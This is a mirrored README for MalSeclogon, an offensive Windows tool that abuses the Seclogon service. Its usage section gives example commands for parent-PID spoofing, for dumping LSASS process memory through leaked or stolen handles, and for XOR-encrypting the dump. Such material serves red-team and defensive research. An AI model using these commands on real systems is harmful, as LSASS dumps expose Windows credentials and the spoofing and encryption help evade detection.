GitPlanet

Cheap and reliable Node.js hosting starts at $3/month, and $1/month static HTML hosting

Created with love in Canada, visit hostnodejs.com today

Feel like to post an Ad? Learn Details
All Projects → antonioCoco → MalSeclogon

antonioCoco / MalSeclogon

Licence: GPL-3.0 license
A little tool to play with the Seclogon service

Programming Languages

c
50402 projects - #5 most used programming language

MalSeclogon

A little tool to play with the Seclogon service.

Full technical details at:

Usage

        MalSeclogon v0.2
        @splinter_code

Args:
-p Pid of the process to spoof the PPID through seclogon service
-d Dump lsass method
        1 = Dump lsass by using leaked handles
        2 = Dump lsass by using leaked handles and cloned lsass process
        3 = Dump lsass by stealing handle from seclogon. (Default)
-o Output path of the dump (default C:\lsass.dmp)
-c Commandline of the spoofed process, default: cmd.exe (not compatible with -d)
-k Xor key to encrypt the dump. Compatible only with -d 3. Allowed values 1-255. Default = 40.
-f Path to an encrypted dump file. This decrypt the dump. If no -k key are specified the default value is 40.

Examples:
- Run a process with a spoofed PPID:
        Malseclogon.exe -p [PPID] -c cmd.exe
- Dump lsass by using leaked handles:
        Malseclogon.exe -d 1
- Dump lsass by using leaked handles and cloned lsass process:
        Malseclogon.exe -d 2
- Dump lsass by stealing handle from seclogon using xor key 40:
        Malseclogon.exe -d 3 -o C:\lsass.dmp.xor -k 40
- Decrypt an lsass dmp file with the key 40:
        Malseclogon.exe -f C:\lsass.dmp.xor -k 40

Build instructions

Do not build "Debug" or "x86" releases. The compiled binary won't work if using these builds. The right build to use is "Release x64".

Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].